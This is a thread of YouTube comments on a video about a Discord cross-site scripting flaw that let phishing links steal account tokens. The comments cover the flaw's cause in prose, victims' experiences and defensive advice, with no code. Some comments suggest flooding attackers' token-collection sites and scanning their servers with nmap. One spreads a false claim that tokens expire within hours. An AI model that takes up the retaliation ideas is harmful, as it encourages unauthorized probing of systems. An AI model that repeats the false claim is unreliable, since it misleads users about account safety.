Wow... This is a school grade level exploit. Anyone who paid attention to basic website security knows how to prevent this attack. And yet Discord's dev team is so incompetent that it couldn't even prevent something this basic.
@@0.r0 You seem like you're 12 with that spelling. Discord devs work at discord for money not a badge? And you have to be over 18 to actaully work at discord.
The crazy thing is that React (which Discord is built with) literally has XSS protection built into it, meaning the developers had to deliberately go out of their way to make this exploit possible.
God, the absolute leveling that this guy does is addicting. This guy feels like one of those parents that would go: "Yeah, school sucks, heres why it sucks-"
Fun fact. Changing your password doesn't always work. I actually once got hacked on Discord, and instantly changed my password the moment I knew what had happened. Before the scammer even had a chance to do it themselves. They still got control of my account. Next level tomfoolery indeed.
In token stealing exploits, you may have to explicitly invalidate all your login sessions, which discord does allow you to do. Changing passwords doesn't necessary invalidate all existing login session tokens, though if discord had any sense they should.
They probably just send an automatic POST request to change the password to the discord server upon receiving the token immediately. Most likely that's why you don't have time to change your password in time
@@Coder_Tavi links get censored by YT (only the poster can see it, nobody else), which might explain why it's showing "2 replies" yet only one shows up
Why don't we create a script that generates tokens and sends them to all known token saving sites? Fill up their databases and have them be less effective
Safer to send junk and not actual tokens. Provided they don't have checking it'll still work and doesn't carry the risk of accidentally sending a legit token.
I dont know if I should say this but I literally saw/knew a guy who said he can just token grab people by just giving a invite link and that was over a year ago ,just how many people have known about it before this vid almost scary
i mean, this link is looking safe. So the only possibility is, to not use the internet at all or don't use services like discord (what ever this means)
Bro u clearly know nothing. 1. They didnt create an XSS Exploit, a person which found the vulnerability created the exploit 2. Even in Google, Nvidia, Apple etc. are xss, and even more dangerous vulnerabilities (like ssrf, or with that RCE) found (daily), so pls dont just talk shit about discord, when u clearly know nothing about this topic. Look at for example Hackerone and see how many reports are daily submitted and resolved.
@@testuser1235 I ain't your "bro", either way you're still incorrect. Discord developed the application therefore they created the exploitable surface. Perhaps I didn't make that part of my comment clear. I'm not sure why you're white knighting Discord as if they're gonna give you a job for defending them...
Thank you for sharing this important information about the Discord NFT scam link. Your video is helping to educate and protect the community. Keep up the good work in raising awareness about these types of threats
As someone that is still learning web development, this stuff kinda scares me. My knowledge on network security as well as vulnerability detection is not that much yet.
man, the last time I saw such a major and easy xss vulnerability was xss in tweetdeck 8 years ago. and that was just a self-retweeting tweet. such incompetence.
@@0xNe NFTs are used in cars from Alfa Romeo for example. NFTs are for metadata storage, and yeah, a lot of people (mostly scammers) use it to store a link to a image to sell it. But NFTs aren't images or something. This metadata can be anything and can be used for a lot of things (car maintenance info, keys to your car, event tickets, subscriptions, in-game characters or items, login info etc).
@@user-ku9vx6uj4o no shit, wheres ur prev comment? and where did i ask what are nfts? i know what they are, and I, in fact, know that people who bought into nfts are dumbest people in existence and most of them lost money, so every time they lose again, its a good news
@@user-ku9vx6uj4o ye i dont see yours too i only see the one from 1hour ago, others are only on notifs, we will argue some other day since theres no point if we cant see comments, have a nice day sir
I found someone that’s been doing this to get people’s tokens and selling their tokens since the QR code scam, I’ve always thought this was possible but never had a sample to work with like you did, good job man!
Hey, I have been watching for a long while, and I only now just realized that I was never subscribed! Your videos have always been recommended to me :)
i didn't even know what this was called but as soon as i saw the html i knew exactly what was going on. like no way did they let you just write html in a text description like that
i’m genuinely surprised this was overlooked, literally no validation checks or encoding on the html to make sure that scrips aren’t being executed.. it’s unsurprising coming from discord though
@@zydn Yes that’s true when using JSX. But this exploit was done through the state management software. When someone loads the page it get exploited before the page even renders out html. If it was in the JSX it would have been sanitized
@@zydn React takes some steps to protect against simple xss attacks and html input vector rendering. displaying script tags, for instance, or other things. The exploit in this case is trickier than you might expect because it only guards against DOM-based XSS assaults, although XSS comes in a variety of forms. Having said that, data sanitization might have easily avoided this.
I think what's crazy is that people are just now figuring out about this exploit which has actually been around for nearly 2 years now. Also most of the people hijacking accounts are focusing on people with og or "leets" for username and account age so that they can keep it and or sell it. A "leet" would be a username like root#0001 for example.
This is why you don't click links. Even if it's from someone you think you know, try to engage them in a conversation (esp if you haven't heard from them in a minute); if they talk different than normal, you know
@C00L3R Not really. It's like saying Slack is *just* for companies. The only companies on Element in my vicinity is the company of the lads. Also, with Guilded... Roblox Corporation. Enough said. Plus, it's free (libre) and open source, which should be the norm for communications/chat apps.
I actually had my Discord account stolen a while ago - after signing into what I thought was a Discord page. They changed my password (which is how I learned that the account was hijacked). They deleted everything, logged my account into a bunch of random servers, then game my account back. When I contacted Discord, they told me that it was impossible for my account to have been stolen. After I got my account back (no help from Discord on this front, since they insisted that it wasn’t even possible), I asked them if they could tell me where my account was accessed from. I never got a reply back from them. I found out on my own, using Discords own tools, what countries (yes, more than one) my account had been accessed from between the time it was stolen and the time it was “returned”.
brainfart: could people theoretically spam the blueh and/or hawkemedia links with fake/random tokens via scripts to throw some sand in their gearbox? obviously not all from the same IP so it's not as easy for them to filter out. they'd have to figure out if the tokens they collected are actually valid, and i guess would be kinda pissed if 99% aren't lol 🤔
This shows how little testing they have. If they'd had more testing, especially for such a simple webpage, this would have never made it to live. Xss is very simple to prevent and, as many people have posted many times before, is very simple to escape a user's input. Apparently Discord doesn't know/follow the "never trust user input" rule. Also, with Discord being as big as it is, you'd think they'd do vulnerability testing that would have told them about this problem long before it got out of dev.
This happened to me. I got offered to be paid to "test" a service or something similar and be invited to a server. I just simply ignored those DMs. They were persistent and would try one or two more times, I still never clicked on them.
Fantastic video to inform us all about it but to be honest if you just stick to the rule of never clicking on any links before asking around or anything is the safest way to go Do not let your curiosity or greed get the better of you as those are usually how you fall for any scams Always ask yourself what could happen or simply why do I have to click on something someone sent me in dm which I have never spoken to before. Always have a certain level of distrust as come on this is the internet unless you know them personally irl you should always that certain level of awareness as anything could happen such as even your best friend on internet for years could turn on you for personal benefits
It is possible to do a lot of input sanitization, CORS policy changes and CSP changes to circumvent a lot of XSS, but in the end you probably won't get everything. Hackers will reverse a site and try to find a bypass to the filter you set in place. It isn't necessarily Discord's fault because it took hackers this long to discover it. It just goes to show that nothing you do as a security researcher and engineer will truly patch a vulnerability fully, but instead just makes it harder for a hacker to exploit it. Discord does have a bug bounty, but if crypto scams will yield more money than the reward money from the bug bounty, it makes more sense for hackers to exploit it rather than responsibly disclosing it.
@@JaivianDean Even then, reflected XSS is one of the least serious types of XSS. If it were to have been stored XSS, we would have had a huge problem (worse than this one). This still required a little social engineering and user interaction to pull off. Though that kinda makes sense, they should have probably checked for something like that before they pushed an update.
Like I said, the only way to stop this, is to deal with the hackers one on one. Trying to patch up a broken wall, to hide from them, is only delaying the inevitable, because they will ALWAYS find you. Sadly, everyone chooses to literally allow them to do these things.
Stealing a Discord token is incredibly bad. If you lose the token and the recipient has any sort of scripting set up, you can expect to have the entire account stolen inside of 30 seconds. I'd fallen for a phish where I was asked to test a game distributed over Itch. It stole my Discord token from my Discord desktop client, logged me out, and closed the client. And despite having 2FA on my account, I was unable to log back in again, as the token thief managed to strip 2FA AND change the password AND change the email address on it. Without any sort of request for 2FA tokens from my phone or passwords. I'd asked Discord support over Twitter for assistance, and they'd reverted the email address back to mine... but presumably the token never got reset or the token stealer was still running on my machine, because it was stolen and yanked away from me yet again. And yes, I was a paying Nitro user with saved payment information. Thankfully, because I paid via PayPal, I was able to tell PayPal to never send any money toward Discord and saved myself ~US$150 of fraudulent purchases.
I can't believe that discord forgot about it! It's legit on the OWASP top 10 web app vulnerabilities. A lot of these big companies forget about web app security 101 and it's sad.
They outsource things like frontend to their diversity-hire tokens or to overseas workers entirely. Many major companies do it. It's why websites like RU-vid and Discord are getting progressively worse and worse from an interface perspective
I see everyone hating on discord. I am a bug bounty hunter and we gotta understand that all of us are humans, everyone makes mistakes, way bigger companies are getting hacked daily with way stupider vulnerabilities and you gotta remember there are millions of places where you have to check for vulnerabilities. Of course it sounds stupid that it had such a stupid vulnerability because it was found and sounds like ‘holly shit everybody could find it’ it’s actually not working like that 😂
With modern JS frameworks the threat of XSS is lessened. React makes it obvious when you might have issues by making you type out "dangerouslySetInnerHTML" when you're doing something that is likely dumb. In React if you pass a "" to anything else it will be interpreted as text. This makes developers less aware of threats because XSS hasn't been a concern to them, until there's SSR and the browser is no longer told to interpret "" as text but it looks like it should be an element. It's super simple to avoid, but at the same time it's easy for developers to forget that it's a concern.
It's stupid that Discord did that, but it is also astounding that redux put the vulnerable code on their website, with only a comment in the snippet saying "hey check this link for security issues", instead of including the two function calls that make it safe. And then I wonder why Discord server side renders/ templates it in there in the first place, js can access the query param itself... Truthfully as a developer I have to say that unfortunately I have had many less than competent colleagues, and combined with pressure and negligence from management that has lead to very similar and worse issues a number of times. These issues don't come out of nowhere.
LOL, how ironic that hackers are stealing discord tokens, yet they couldnt be bothered to update their version of nginx (which is old and very insecure)
Sometimes, it's the implementation of XSS prevention which is vulnerable. There was evidence of existing XSS prevention in the audit that was made. Don't flame them too hard.
i feel so bad for the people who had their accounts stolen but holy fuck is that funny lmao. It's such an easy thing to fix and I don't know how it's ever a thing in 2022
What one could do in case of these dead ends mentioned in the video, it is always possible to look where the servers are hosted and what they are doing with them. ping, traceroute and nmap are your friends.
How the hell does a junior developer like myself understand how to prevent xss better than discord. This honestly screams of gross negligence and laziness
Even if you prevented it, sometimes xss prevention itself is a flaw, there are nearly infinite ways where a input can be sanitized, it’s a even in a good system, it’s a matter of time where it’s bound to happen
ok so a bunch of people are saying stuff about React or DOMPurify, but what it looks like actually happened is they literally inserted the user-generated text INSIDE a script element before running it (either serverside or with .unsafeHTML). this is because the first part of the visible script we see is an end-script tag, so the injected script first needs to end the real discord script element (to avoid syntax errors), start its own with the token stealing, and then end it's and start a new one for the rest of discord's script. this is literally the MOST OBVIOUS xxs i've EVER SEEN, its literally fucking inserting text _from the user_ IN THE MIDDLE OF YOUR JAVASCRIPT literally wtf discord
I was around the hacking space when this vulnerability was found. My friend tested it on me and we thought it was a cool little gimmick but nothing worth using against anyone except enemies. That was 6 years ago I believe, if it’s really been this long and they haven’t patched it, that’s extremely sad. Honestly a low level exploit as well.
Your discord token will automatically change within 6-8 hours I think or maybe 12. It doesn't stay the same forever. They can send automated requests using that. But they can't change your password or access the full discord account. Unless they know the Server ID, Channel ID in which they want to send the message in. So they would have that info probably of only one server in which you were with the guy that sent you the link.
Two wrongs in this message. Firstly, the Discord token does not expire until you change your password or change two-factor authentication settings. Secondly, you are able to access the full account, it's very simple to log into an account using the token. Don't spread false security tips, it helps no one
I swear my account one got hacked, and it did something worse than take my money. It blocked all my friends, while sending them a false hate message! Im better now, and yes it was the QR code thing
It probably got in their DB, and then the page just loaded the values from their DB, which they did not sanitize properly. Kinda makes you wonder if the server is even verifying input properly before posting data in the database.. SQL Injections..
This might be a really stupid question, but why do Discord Tokens exist? Most scamming attempts seem to try and get your Token. What do we need it for? Cant we just always have our account bound with username password and 2fa?
A token is a long string of text stored in your browser that it sends to the server, to let it know who you are instead of just sending your username and password every time as that would require storing your password in plaintext somewhere or making a brand new system which is unnecessary, without a token a server couldnt verify who you are and would require you to log in every single time you want to do literally anything
It wouldn't have been a thing in this day and age if we'd gotten rid of the hackers a long time ago. But we don't. We just keep gluing a cracked wall together with raisins and mud hoping that someone can't just bust it down and get to you.
This is why sensitive information is better saved in cookies instead of in session. This info isn't accessible by scripts if you are using HTTP-only cookies
